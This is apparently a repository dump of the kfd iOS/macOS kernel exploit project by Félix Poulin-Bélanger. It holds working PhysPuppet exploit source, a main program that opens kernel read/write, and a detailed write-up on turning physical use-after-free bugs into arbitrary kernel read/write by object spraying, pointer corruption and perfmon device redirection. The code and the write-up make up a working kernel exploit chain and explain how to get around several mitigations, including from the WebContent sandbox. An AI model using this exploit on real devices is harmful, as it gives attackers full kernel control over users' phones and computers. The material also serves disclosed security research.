vm_named_entry. It will be backed by a vm_object with a 27 | * vo_size of 3 pages and an initial ref_count of 1. 28 | */ 29 | mach_port_t named_entry = MACH_PORT_NULL; 30 | assert_mach(mach_memory_object_memory_entry_64(mach_host_self(), true, physpuppet_vmne_size, VM_PROT_DEFAULT, MEMORY_OBJECT_NULL, &named_entry)); 31 | 32 | /* 33 | * STEP 2: 34 | * 35 | * Map the vm_named_entry into our vm_map. This will create a 36 | * vm_map_entry with a vme_start that is page-aligned, but a vme_end 37 | * that is not (vme_end = vme_start + 1 page + 1 byte). The new 38 | * vm_map_entry's vme_object is shared with the vm_named_entry, and 39 | * therefore its ref_count goes up to 2. Finally, the new vm_map_entry's 40 | * vme_offset is 1 page. 41 | */ 42 | vm_address_t address = 0; 43 | assert_mach(vm_map(mach_task_self(), &address, (-1), 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR, named_entry, physpuppet_vme_offset, false, VM_PROT_DEFAULT, VM_PROT_DEFAULT, VM_INHERIT_DEFAULT)); 44 | 45 | /* 46 | * STEP 3: 47 | * 48 | * Fault in both pages covered by the vm_map_entry. This will populate 49 | * the second and third vm_pages (by vmp_offset) of the vm_object. Most 50 | * importantly, this will set the two L3 PTEs covered by that virtual 51 | * address range with read and write permissions. 52 | */ 53 | memset((void*)(address), 'A', physpuppet_vme_size); 54 | 55 | /* 56 | * STEP 4: 57 | * 58 | * Unmap that virtual address range. Crucially, when vm_map_delete() 59 | * calls pmap_remove_options(), only the first L3 PTE gets cleared. The 60 | * vm_map_entry is deallocated and therefore the vm_object's ref_count 61 | * goes down to 1. 62 | */ 63 | assert_mach(vm_deallocate(mach_task_self(), address, physpuppet_vme_size)); 64 | 65 | /* 66 | * STEP 5: 67 | * 68 | * Destroy the vm_named_entry. The vm_object's ref_count drops to 0 and 69 | * therefore is reaped. This will put all of its vm_pages on the free 70 | * list without calling pmap_disconnect(). 71 | */ 72 | assert_mach(mach_port_deallocate(mach_task_self(), named_entry)); 73 | kfd->puaf.puaf_pages_uaddr[i] = address + physpuppet_vme_offset; 74 | 75 | /* 76 | * STEP 6: 77 | * 78 | * At this point, we have a dangling L3 PTE. However, there's a 79 | * discrepancy between the vm_map and the pmap. If not fixed, it will 80 | * cause a panic when the process exits. Therefore, we need to reinsert 81 | * a vm_map_entry in that virtual address range. We also need to fault 82 | * in the first page to populate the vm_object. Otherwise, 83 | * vm_map_delete() won't call pmap_remove_options() on exit. But we 84 | * don't fault in the second page to avoid overwriting our dangling PTE. 85 | */ 86 | assert_mach(vm_allocate(mach_task_self(), &address, physpuppet_vme_size, VM_FLAGS_FIXED)); 87 | memset((void*)(address), 'A', physpuppet_vme_offset); 88 | } 89 | } 90 | 91 | void physpuppet_cleanup(struct kfd* kfd) 92 | { 93 | u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); 94 | u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); 95 | 96 | for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { 97 | u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; 98 | if ((puaf_page_uaddr == kread_page_uaddr) || (puaf_page_uaddr == kwrite_page_uaddr)) { 99 | continue; 100 | } 101 | 102 | assert_mach(vm_deallocate(mach_task_self(), puaf_page_uaddr - physpuppet_vme_offset, physpuppet_vme_size)); 103 | } 104 | } 105 | 106 | void physpuppet_free(struct kfd* kfd) 107 | { 108 | u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); 109 | u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); 110 | 111 | assert_mach(vm_deallocate(mach_task_self(), kread_page_uaddr - physpuppet_vme_offset, physpuppet_vme_size)); 112 | if (kwrite_page_uaddr != kread_page_uaddr) { 113 | assert_mach(vm_deallocate(mach_task_self(), kwrite_page_uaddr - physpuppet_vme_offset, physpuppet_vme_size)); 114 | } 115 | } 116 | 117 | #endif /* physpuppet_h */ 118 | -------------------------------------------------------------------------------- /macos_kfd.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #define TARGET_MACOS 1 6 | #include "kfd/libkfd.h" 7 | 8 | int main(void) 9 | { 10 | u64 kfd = kopen(2048, puaf_smith, kread_sem_open, kwrite_sem_open); 11 | // At this point, kfd can be used with kread() and kwrite(). 12 | kclose(kfd); 13 | } 14 | -------------------------------------------------------------------------------- /writeups/exploiting-puafs.md: -------------------------------------------------------------------------------- 1 | # Exploiting PUAFs 2 | 3 | --- 4 | 5 | ## Table of Contents 6 | 7 | - [What is a PUAF primitive?](#what-is-a-puaf-primitive) 8 | - [What to do before a PUAF exploit?](#what-to-do-before-a-puaf-exploit) 9 | - [What to do after a PUAF exploit?](#what-to-do-after-a-puaf-exploit) 10 | - [Impact of XNU mitigations on PUAF exploits](#impact-of-xnu-mitigations-on-puaf-exploits) 11 | - [Appendix: Discovery of the PUAF primitive](#appendix-discovery-of-the-puaf-primitive) 12 | 13 | --- 14 | 15 | ## What is a PUAF primitive? 16 | 17 | PUAF is an acronym for "physical use-after-free". As opposed to a normal UAF, which stems from a 18 | dangling pointer to a virtual address (VA), a PUAF originates from a dangling pointer to the 19 | physical address (PA) of a memory region. Although PA pointers could be stored in other kernel data 20 | structures, here it will be assumed that the dangling PA pointer is contained directly in a 21 | leaf-level page table entry (i.e. an L3 PTE in the case of iOS and macOS) from the page table 22 | hierarchy of the exploiting user process. In addition, in order to qualify as a PUAF primitive, it 23 | will also be assumed that the corresponding physical page has been put back on the free list. In 24 | XNU, every physical page of memory is represented by a `vm_page` structure, whose `vmp_q_state` 25 | field determines which queue the page is on, and whose `vmp_pageq` field contains 32-bit packed 26 | pointers to the next and previous pages in that queue. Note that the main "free list" in XNU is 27 | represented by `vm_page_queue_free`, which is an array of `MAX_COLORS` (128) queues (although the 28 | actual number of free queues used depends on the device configuration). Finally, although a dangling 29 | PTE with read-only access in the AP bits (e.g. [P0 issue 2337][1]) would still be considered an 30 | important security vulnerability, it would not be directly exploitable. Therefore, in this write-up, 31 | a PUAF primitive entails that the dangling PTE gives read/write access to user space in the AP bits. 32 | To summarize, in order to obtain a PUAF primitive, we must achieve a dangling L3 PTE with read/write 33 | access on a physical page which has been put back on the free list, such that the kernel can grab it 34 | and reuse it for absolutely anything! 35 | 36 | [1]: https://bugs.chromium.org/p/project-zero/issues/detail?id=2337 37 | 38 | --- 39 | 40 | ## What to do before a PUAF exploit? 41 | 42 | As mentioned above, once a PUAF primitive has been achieved, the corresponding physical pages could 43 | be reused for anything. However, if the higher-privileged Page Protection Layer (PPL) is running out 44 | of free pages in `pmap_ppl_free_page_list`, the regular kernel might grab pages from its own free 45 | queues and give them to PPL by calling `pmap_mark_page_as_ppl_page_internal()`. That said, this PPL 46 | routine will verify that the given page is indeed not mapped outside of the physical aperture, or 47 | else it will trigger a "page still has mappings" panic. But since a PUAF primitive requires a 48 | dangling PTE, this check would always fail and cause a kernel panic. Therefore, after obtaining PUAF 49 | pages, we must avoid marking them as PPL-owned. Hence, before starting a PUAF exploit, we should 50 | attempt to fill `pmap_ppl_free_page_list` as much as possible, such that PPL is less likely to run 51 | out of free pages during the critical section of the exploit. Fortunately, we can easily allocate 52 | PPL-owned pages by calling `vm_allocate()` with the flag `VM_FLAGS_FIXED` for all addresses aligned 53 | to the L2 block size inside the allowed VA range of our VM map. If there were previously no mappings 54 | in that L2 block size, then PPL will first need to allocate an L3 translation table to accomodate 55 | the new mapping. Then, we can simply deallocate those mappings and PPL will put the empty L3 56 | translation table pages back in `pmap_ppl_free_page_list`. This is done in the function 57 | `puaf_helper_give_ppl_pages()`, located in [puaf.h](../kfd/libkfd/puaf.h). 58 | 59 | On macOS, the maximum VA that is mappable by a user process (i.e. `current_map()->max_offset`) is 60 | quite high, such that we can fill the PPL page free list with an extremely large number of pages. 61 | However, on iOS, the maximum VA is much lower, such that we can only fill it with roughly 200 pages. 62 | Despite that, I almost never run into the "page still has mappings" panic, even when the exploit is 63 | configured to obtain 2048 PUAF pages, which works great for personal research. Please note that a 64 | higher number of PUAF pages makes it easier for the rest of the exploit to achieve a kernel 65 | read/write primitive. That said, for maximum reliability, if the PUAF exploit is repeatable (e.g. 66 | PhysPuppet), an attacker could instead obtain a PUAF primitive on a smaller number of pages, then 67 | attempt to get the kernel read/write primitive, and repeat the process as needed if the latter part 68 | did not succeed. 69 | 70 | --- 71 | 72 | ## What to do after a PUAF exploit? 73 | 74 | Let's suppose that we have successfully exploited a vulnerability to obtain a PUAF primitive on an 75 | arbitrary number of physical pages, now what? Note that free pages are added at the tail of the free 76 | queues by the `vm_page_queue_enter()` macro, but there is no way from user space to know exactly 77 | where our PUAF pages are going to be located in those free queues. In order to remedy that, we can 78 | do the following: 79 | 80 | 1. Run some code that will grab a few pages from the free queues and populate them with unique and 81 | recognizable content. 82 | 2. Scan all the PUAF pages for that recognizable content by reading through the dangling PTEs. 83 | 3. If we find the content, then we have reached the PUAF pages in one of the free queues, so we can 84 | move on to the next stage. Otherwise, we go back to step 1 to grab a few more pages, and we 85 | repeat this loop until we finally hit the PUAF pages. 86 | 87 | This stage of the exploit could probably be optimized tremendously to take into account the fact 88 | that `vm_page_queue_free` is made up of an array of free queues. However, as it stands, the exploit 89 | will simply grab free pages in chunks of 4 by calling `vm_copy()` on a purgeable source region, 90 | until a quarter of the PUAF pages have been successfully grabbed. This is a gross heuristic that 91 | completely wastes 25% of the PUAF pages, but it has worked exceedingly well for me, so I never had 92 | to optimize it further. This is done in the function `krkw_helper_grab_free_pages()`, located in 93 | [krkw.h](../kfd/libkfd/krkw.h), which I might upgrade in the future. 94 | 95 | Now that our PUAF pages are likely to be grabbed, we can turn the PUAF primitive into a more 96 | powerful kernel read/write primitive with the following high-level strategy: 97 | 98 | 1. Spray an "interesting" kernel object, such that it is reallocated in one of the remaining PUAF 99 | pages. 100 | 2. Scan the PUAF pages through the dangling PTEs for a "magic value" to confirm the successful 101 | reallocation and to identify exactly which PUAF page contains the target kernel object. 102 | 3. Overwrite a non-PAC'ed kernel pointer in the target kernel object with a fully controlled value, 103 | by directly overwriting it through the appropriate dangling PTE. It would also be possible to 104 | craft a set of fake kernel objects within the PUAF pages if necessary, but none of the methods 105 | described below require that. 106 | 4. Get a kernel read or kernel write primitive through a syscall that makes use of the overwritten 107 | kernel pointer. 108 | 109 | For example, in my original exploit for PhysPuppet, I was inspired by SockPuppet and decided to 110 | target socket-related objects. Thus, the generic steps listed above would map to the specific 111 | actions listed below: 112 | 113 | 1. Spray `inp_tp` structures with the `socket()` syscall. 114 | 2. Scan the PUAF pages for the magic value in the `t_keepintvl` field, which has been set with the 115 | `setsockopt()` syscall for the `TCP_KEEPINTVL` option. 116 | 3. Overwrite the `inp6_outputopts` field, which is a pointer to a `ip6_pktopts` structure. 117 | 4. Get a 4-byte kernel read primitive from `inp6_outputopts->ip6po_minmtu` with the `getsockopt()` 118 | syscall for the `IPV6_USE_MIN_MTU` option, and get a 4-byte kernel write primitive restricted to 119 | values between -1 and 255 from `inp6_outputopts->ip6po_tclass` with the `setsockopt()` syscall 120 | using the `IPV6_TCLASS` option. 121 | 122 | However, I was not really satisfied with this part of the exploit because the kernel write 123 | primitive was too restricted and the required syscalls (i.e. `socket()` and `[get/set]sockopt()`) 124 | are all denied from the WebContent sandbox. That said, when I found the vulnerability for Smith, 125 | which was exploitable from WebContent unlike PhysPuppet, I decided to look for other interesting 126 | target kernel objects which could be sprayed from the WebContent sandbox, such that the entire 127 | exploit satisfied that constraint. Unlike for the socket method described above, which used the same 128 | target kernel object for both the kernel read and write primitives, I ended up finding distinct 129 | objects for both primitives. 130 | 131 | Here is the description of the 132 | [`kread_kqueue_workloop_ctl` method](../kfd/libkfd/krkw/kread/kread_kqueue_workloop_ctl.h): 133 | 134 | 1. Spray `kqworkloop` structures with the `kqueue_workloop_ctl()` syscall. 135 | 2. Scan the PUAF pages for the magic value in the `kqwl_dynamicid` field, which has been set 136 | directly by `kqueue_workloop_ctl()` above. 137 | 3. Overwrite the `kqwl_owner` field, which is a pointer to a `thread` structure. 138 | 4. Get an 8-byte kernel read primitive from `kqwl_owner->thread_id` with the `proc_info()` syscall 139 | for the `PROC_INFO_CALL_PIDDYNKQUEUEINFO` callnum. 140 | 141 | And here is the description of the [`kwrite_dup` method](../kfd/libkfd/krkw/kwrite/kwrite_dup.h): 142 | 143 | 1. Spray `fileproc` structures with the `dup()` syscall (to duplicate any file descriptor). 144 | 2. This time, no fields can be set to a truly unique magic value for the `fileproc` structure. 145 | Therefore, we scan the PUAF pages for the expected bit pattern of the entire structure. Then, we 146 | use the `fcntl()` syscall with the `F_SETFD` cmd to update the value of the `fp_flags` field to 147 | confirm the successful reallocation and to identify exactly which file descriptor owns that 148 | `fileproc` object. 149 | 3. Overwrite the `fp_guard` field, which is a pointer to a `fileproc_guard` structure. 150 | 4. Get an 8-byte kernel write primitive from `fp_guard->fpg_guard` with the `change_fdguard_np()` 151 | syscall. However, that method cannot overwrite a value of 0, nor overwrite any value to 0. 152 | 153 | This worked well enough, and at the time of writing, all the syscalls used by those methods are part 154 | of the WebContent sandbox. However, although the `proc_info()` syscall is allowed, the 155 | `PROC_INFO_CALL_PIDDYNKQUEUEINFO` callnum is denied. Therefore, I had to find another kernel read 156 | primitive. Fortunately, it was pretty easy to find one by looking at the other callnums of 157 | `proc_info()` which are allowed by the WebContent sandbox. 158 | 159 | Here is the description of the [`kread_sem_open` method](../kfd/libkfd/krkw/kread/kread_sem_open.h): 160 | 161 | 1. Spray `psemnode` structures with the `sem_open()` syscall. 162 | 2. Once again, no fields can be set to a truly unique magic value for the `psemnode` structures. 163 | Therefore, we scan the PUAF pages for four consecutive structures, which should contain the same 164 | `pinfo` pointer in the first 8 bytes and zero padding in the second 8 bytes. Then, we increment 165 | the `pinfo` pointer by 4 through the dangling PTE and we use the `proc_info()` syscall to 166 | retrieve the name of the posix semaphore, which should now be shifted by 4 characters when we hit 167 | the right file descriptor. 168 | 3. Overwrite the `pinfo` field, which is a pointer to a `pseminfo` structure. 169 | 4. Get an 8-byte kernel read primitive from `pinfo->psem_uid` and `pinfo->psem_gid` with the 170 | `proc_info()` syscall for the `PROC_INFO_CALL_PIDFDINFO` callnum, which is not denied by the 171 | WebContent sandbox. 172 | 173 | Please note that `shm_open()`, which is also part of the WebContent sandbox, could also be used to 174 | achieve a kernel read primitive, in much the same way as `sem_open()`. However, `sem_open()` makes 175 | it easier to determine the address of `current_proc()` through the semaphore's `owner` field. 176 | Lastly, the [`kwrite_sem_open` method](../kfd/libkfd/krkw/kwrite/kwrite_sem_open.h) works just like 177 | the `kwrite_dup` method, but the `fileproc` structures are sprayed with the `sem_open()` syscall 178 | instead of the `dup()` syscall. 179 | 180 | At this point, we have a decent kernel read/write primitive, but there are some minor encumbrances: 181 | 182 | - The kernel read primitive successfully reads 8 bytes from `pinfo->psem_uid` and `pinfo->psem_gid`, 183 | but it also reads other fields of the `pseminfo` structure located before and after those two. 184 | This can cause problems if the address we want to read is located at the very beginning of a page. 185 | In that case, the fields before `psem_uid` and `psem_gid` would end up in the previous virtual 186 | page, which might be unmapped and therefore cause a "Kernel data abort" panic. Of course, in such 187 | a case, we could use a variant that is guaranteed to not underflow a page by using the first bytes 188 | read from the modified kernel pointer. This is done in the function `kread_sem_open_kread_u32()`. 189 | - The kernel write primitive cannot overwrite a value of 0, nor overwrite any value to 0. There are 190 | simple workarounds for both scenarios. For example, the function `smith_helper_cleanup()` uses 191 | such a workaround to overwrite a value of 0. The workaround to overwrite a value to 0 is left as 192 | an exercise for the reader. 193 | 194 | Although we can overcome these impediments easily, it would be nice to bootstrap a better kernel 195 | read/write from those initial primitives. This is achieved in [perf.h](../kfd/libkfd/perf.h), 196 | but libkfd only supports this part of the exploit on the iPhone 14 Pro Max for certain versions 197 | of iOS (see the supported versions in the function `perf_init()`). Currently, I am using some static 198 | addresses from those kernelcaches to locate certain global kernel objects (e.g. `perfmon_devices`), 199 | which cannot be found easily by chasing data pointers. It would probably be possible to achieve the 200 | same outcome dynamically by chasing offsets in code, but this is left as an exercise for the reader 201 | for now. As it stands, here is how the setup for the better kernel read/write is achieved: 202 | 203 | 1. We call `vm_allocate()` to allocate a single page, which will be used as a shared buffer between 204 | user space and kernel space later on. Note that we also call `memset()` to fault in that virtual 205 | page, which will grab a physical page and populate the corresponding PTE. 206 | 2. We call `open("/dev/aes_0", O_RDWR)` to open a file descriptor. Please note that we could open 207 | any character device which is accessible from the target sandbox, because we will corrupt it 208 | later on to redirect it to `"/dev/perfmon_core"` instead. 209 | 3. We use the kernel read primitive to obtain the slid address of the function `vn_kqfilter()` by 210 | chasing the pointers `current_proc()->p_fd.fd_ofiles[fd]->fp_glob->fg_ops->fo_kqfilter`, where 211 | "fd" is the opaque file descriptor returned by the `open()` syscall in the previous step. 212 | 4. We calculate the kernel slide by substracting the slid address of the function `vn_kqfilter()` 213 | with the static address of that function in the kernelcache. We then make sure that the base of 214 | the kernelcache contains the expected Mach-O header. 215 | 5. We use the kernel read primitive to scan the `cdevsw` array until we find the major index for 216 | `perfmon_cdevsw`, which seems to always be 0x11. 217 | 6. From the `fileglob` structure we found earlier, we use the kernel read primitive to retrieve the 218 | original `dev_t` from `fg->fg_data->v_specinfo->si_rdev` and we use the kernel write primitive to 219 | overwrite it such that it indexes into `perfmon_cdevsw` instead. In addition, the `si_opencount` 220 | field is incremented by one to prevent `perfmon_dev_close()` from being called if the process 221 | exits before calling `kclose()`, which would trigger a "perfmon: unpaired release" panic. 222 | 7. We use the kernel read primitive to retrieve a bunch of useful globals (`vm_pages`, 223 | `vm_page_array_beginning_addr`, `vm_page_array_ending_addr`, `vm_first_phys_ppnum`, `ptov_table`, 224 | `gVirtBase`, `gPhysBase` and `gPhysSize`) as well as TTBR0 from `current_pmap()->ttep` and TTBR1 225 | from `kernel_pmap->ttep`. 226 | 8. We can then manually walk our page tables starting from TTBR0 to find the physical address of the 227 | shared page allocated in step 1. And since we retrieved the `ptov_table` in the previous step, we 228 | can then use `phystokv()` to find the kernel VA for that physical page inside the physmap. 229 | 9. Finally, we use the kernel write primitive to corrupt the `pmdv_config` field of the first 230 | perfmon device to point to the shared page (i.e. with the kernel VA retrieved in the previous 231 | step), and to set the `pmdv_allocated` boolean field to `true`. 232 | 233 | At this point, the setup is complete. To read kernel memory, we can now craft a `perfmon_config` 234 | structure in the shared page, as shown in the image below, then use the `PERFMON_CTL_SPECIFY` ioctl 235 | to read between 1 and 65535 bytes from an arbitrary kernel address. In addition, note that the 236 | region being read must satisfy the `zone_element_bounds_check()` in `copy_validate()`, because this 237 | technique uses `copyout()` under the hood. 238 | 239 | ![exploiting-puafs-figure1.png](figures/exploiting-puafs-figure1.png) 240 | 241 | To write kernel memory, we can now craft a `perfmon_config`, `perfmon_source` and `perfmon_event` 242 | structure in the shared page, as shown in the image below, then use the `PERFMON_CTL_ADD_EVENT` 243 | ioctl to write 8 bytes to an arbitrary kernel address. That said, at that point, `kwrite()` can 244 | accept any size that is a multiple of 8 because it will perform this technique in a loop. 245 | 246 | ![exploiting-puafs-figure2.png](figures/exploiting-puafs-figure2.png) 247 | 248 | Finally, on `kclose()`, the function `perf_free()` will restore the `si_rdev` and `si_opencount` 249 | fields to their original values, such that all relevant kernel objects are cleaned up properly when 250 | the file descriptor is closed. However, if the process exits before calling `kclose()`, this cleanup 251 | will be incomplete and the next attempt to `open("/dev/aes_0", O_RDWR)` will fail with `EMFILE`. 252 | Therefore, it would be cleaner to use the kernel write primitive to "manually" close the 253 | device-specific kernel objects of that file descriptor, such that the process could exit at any 254 | moment and still leave the kernel in a clean state. For now, this is left as an exercise for the 255 | reader. 256 | 257 | --- 258 | 259 | ## Impact of XNU mitigations on PUAF exploits 260 | 261 | So, how effective were the various iOS kernel exploit mitigations at blocking the PUAF technique? 262 | The mitigations I condisered were KASLR, PAN, PAC, PPL, `zone_require()`, and `kalloc_type()`: 263 | 264 | - KASLR does not really impact this technique since we do not need to leak a kernel address in order 265 | to obtain the PUAF primitive in the first place. Of course, we eventually want to obtain the 266 | addresses of the kernel objects that we want to read or write, but at that point, we have endless 267 | possibilities of objects to spray inside the PUAF pages in order to gather that information. 268 | - PAN also does not really have an impact on this technique. Although none of the kread and kwrite 269 | methods I described above required us to craft a set of fake kernel objects, other methods could. 270 | In that case, the absence of PAN would be useful. However, in practice, there are plenty of 271 | objects that could leak the address of the PUAF pages in kernel space, such that we could craft 272 | those fake objects directly in those PUAF pages. 273 | - PAC as a form of control flow integrity is completely irrelevant for this technique as it is a 274 | form of data-only attack. That said, in my opinion, PAC for data pointers is the mitigation that 275 | currently has the biggest impact on this technique, because there are a lot more kernel objects 276 | that we could target in order to obtain a kernel read/write primitive if certain members of those 277 | structures had not been signed. 278 | - PPL surprisingly does very little to prevent this technique. Of course, it prevents the PUAF pages 279 | from being reused as page tables and other PPL-protected structures. But in practice, it is very 280 | easy to dodge the "page still has mappings" panic and to reuse the PUAF pages for other 281 | interesting kernel objects. I expect this to change! 282 | - `zone_require()` has a similar impact as data-PAC for this technique, by preventing us from 283 | forging kernel pointers inside the PUAF pages if they are verified with this function. 284 | - `kalloc_type()` is completely irrelevant for this technique as it only provides protection against 285 | virtual address reuse, as opposed to physical address reuse. 286 | 287 | --- 288 | 289 | ## Appendix: Discovery of the PUAF primitive 290 | 291 | First of all, I want to be clear that I do not claim to be the first researcher to discover this 292 | primitive. As far as I know, Jann Horn of Google Project Zero was the first researcher to publicly 293 | report and disclose dangling PTE vulnerabilities: 294 | 295 | - [P0 issue 2325][2], reported on June 29, 2022 and disclosed on August 24, 2022. 296 | - [P0 issue 2327][3], reported on June 30, 2022 and disclosed on September 19, 2022. 297 | 298 | In addition, TLB flushing bugs could be considered a variant of the PUAF primitive, which Jann Horn 299 | found even earlier: 300 | 301 | - [P0 issue 1633][4], reported on August 15, 2018 and disclosed on September 10, 2018. 302 | - [P0 issue 1695][5], reported on October 12, 2018 and disclosed on October 29, 2018. 303 | 304 | For iOS, I believe Ian Beer was the first researcher to publicly disclose a dangling PTE 305 | vulnerability, although with read-only access: 306 | 307 | - [P0 issue 2337][6], reported on July 29, 2022 and disclosed on November 25, 2022. 308 | 309 | Please note that other researchers might have found similar vulnerabilities earlier, but these are 310 | the earliest ones I could find. I reported PhysPuppet to Apple a bit before Ian Beer's issue was 311 | disclosed to the public and, at that time, I was not aware of Jann Horn's research. Therefore, in 312 | case it is of interest to other researchers, I will share how I stumbled upon this powerful 313 | primitive. When I got started doing vulnerability research, during the first half of 2022, I found 314 | multiple buffer overflows in the SMBClient kernel extension and a UAF in the in-kernel NFS client 315 | (i.e. a normal UAF that reuses a VA and not a PA). However, given that I was pretty unexperienced 316 | with exploitation back then and that Apple had already delivered a lot of mitigations for classical 317 | memory corruption vulnerabilities, I had no idea how to exploit them. My proofs-of-concept would 318 | only trigger "one-click" remote kernel panics, but that quickly became unsatisfying. Therefore, 319 | during the second half of 2022, I decided to look for better logic bugs in the XNU kernel. In 320 | particular, I was inspired to attack physical memory by Brandon Azad's blog post 321 | [One Byte to rule them all][7]. That said, his technique required a one-byte linear heap overflow 322 | primitive (amongst other things) to gain the arbitrary physical mapping primitive. But I was 323 | determined to avoid memory corruption, so I decided to look for other logic bugs that could allow a 324 | user process to control the physical address entered in one of its own PTEs. After spending a lot of 325 | time reading and re-reading the VM map and pmap code, I eventually came to the conclusion that 326 | obtaining an arbitrary physical mapping primitive as an initial primitive would be unrealistic. 327 | Fortunately, I got incredibly lucky right after that! 328 | 329 | As I was perusing the code in `vm_map.c` for the thousandth time, I was struck by just how many 330 | functions would assert that the start and end addresses of a `vm_map_entry` structure are 331 | page-aligned (e.g. in `vm_map_enter()`, `vm_map_entry_insert()`, `vm_map_entry_zap()`, and many 332 | other functions). Given that those assertions are not enabled in release builds, I was curious to 333 | know what would happen if we could magically create an "unaligned entry" in our VM map? For example, 334 | if the `vme_start` field was equal to a page-aligned address A but the `vme_end` field was equal to 335 | A + PAGE_SIZE + 1, how would the functions `vm_fault()` and `vm_map_delete()` behave? To my 336 | astonishment, I realized that this condition would trivially lead to a dangling PTE. That said, at 337 | that point in time, this was just an idea, albeit a very promising one! Therefore, I went on to look 338 | for logic bugs that could allow an attacker to create such an unaligned entry. First, I investigated 339 | all the attack surface that was reachable from the WebContent sandbox but I was not able to find one. 340 | However, after giving up on a vulnerability reachable from WebContent, I quickly came across the MIG 341 | routine `mach_memory_object_memory_entry_64()` and found the vulnerability for PhysPuppet, which is 342 | covered in detail in a separate [write-up](physpuppet.md). 343 | 344 | After that, I checked online for existing exploits that achieved a PUAF primitive. At that time, I 345 | could not find any for iOS but that is when I stumbled upon Jann Horn's Mali issues. As a quick 346 | aside, I also skimmed his blog post about [exploiting a simple Linux memory corruption bug][8], 347 | which I mistakenly thought was a variant of the PUAF primitive with a dangling PTE in kernel space 348 | rather than user space. I later realized that this was just a normal UAF, but I got confused because 349 | he exploited it through the page allocator by reallocating the victim page as a page table. That 350 | said, I knew this would not be possible on iOS because of the formidable PPL. However, as I was 351 | already familiar with Ned Williamson's [SockPuppet exploit][9], I had a pretty solid hunch that I 352 | could exploit the dangling PTEs by reallocating socket-related objects inside the PUAF pages, then 353 | by using the `getsockopt()`/`setsockopt()` syscalls in order to obtain the kernel read/write 354 | primitives, respectively. 355 | 356 | [2]: https://bugs.chromium.org/p/project-zero/issues/detail?id=2325 357 | [3]: https://bugs.chromium.org/p/project-zero/issues/detail?id=2327 358 | [4]: https://bugs.chromium.org/p/project-zero/issues/detail?id=1633 359 | [5]: https://bugs.chromium.org/p/project-zero/issues/detail?id=1695 360 | [6]: https://bugs.chromium.org/p/project-zero/issues/detail?id=2337 361 | [7]: https://googleprojectzero.blogspot.com/2020/07/one-byte-to-rule-them-all.html 362 | [8]: https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html 363 | [9]: https://googleprojectzero.blogspot.com/2019/12/sockpuppet-walkthrough-of-kernel.html 364 | -------------------------------------------------------------------------------- /writeups/figures/exploiting-puafs-figure1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/exploiting-puafs-figure1.png -------------------------------------------------------------------------------- /writeups/figures/exploiting-puafs-figure2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/exploiting-puafs-figure2.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure1.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure2.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure3.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure4.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure5.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure6.png -------------------------------------------------------------------------------- /writeups/figures/smith-figure1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/smith-figure1.png -------------------------------------------------------------------------------- /writeups/figures/smith-figure2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/smith-figure2.png -------------------------------------------------------------------------------- /writeups/figures/smith-figure3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/smith-figure3.png -------------------------------------------------------------------------------- /writeups/figures/smith-figure4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/smith-figure4.png --------------------------------------------------------------------------------